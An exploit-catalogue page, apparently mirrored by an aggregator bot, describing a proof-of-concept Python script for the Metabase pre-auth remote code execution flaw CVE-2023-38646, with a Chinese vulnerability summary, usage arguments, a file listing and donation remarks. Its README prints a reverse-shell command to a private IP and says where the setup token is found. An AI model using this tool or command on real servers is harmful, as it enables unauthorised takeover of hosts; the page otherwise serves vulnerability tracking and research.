CVE-2023-38646 PoC — Metabase 安全漏洞

Source

https://github.com/Pyr0sec/CVE-2023-38646

Associated Vulnerability

Title:Metabase 安全漏洞 (CVE-2023-38646)
Description:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞，该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。

Description

Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)

Readme

# Metabase Pre-Auth RCE (CVE-2023-38646) POC
This is a python script which exploits the remote code execution vulnerability of Metabase's login software. It allows us to execute arbitrary commands on the server before authentication.

Vulnerable versions are Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1

## Usage
```
python3 exploit.py -u URL -t TOKEN -c COMMAND
```
## Arguments
```
-h, --help            show this help message and exit
-u URL, --url URL     Target URL
-t TOKEN, --token TOKEN
                      Setup-Token found in /api/session/properties
-c COMMAND, --command COMMAND
                      Command to be executed in the target host
```

## Example
![image](https://github.com/Pyr0sec/CVE-2023-38646/assets/74669749/705d63b5-4a52-42ae-bce7-4fb814883a79)

Command used: `bash -i >& /dev/tcp/10.10.14.26/9001 0>&1`

## References
[Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)

File Snapshot


 [4.0K]  /data/pocs/2c4d0840ca17a21fb0c7386ccee1f2c0982e305f
├── [1.8K]  exploit.py
├── [ 11K]  LICENSE
└── [1009]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!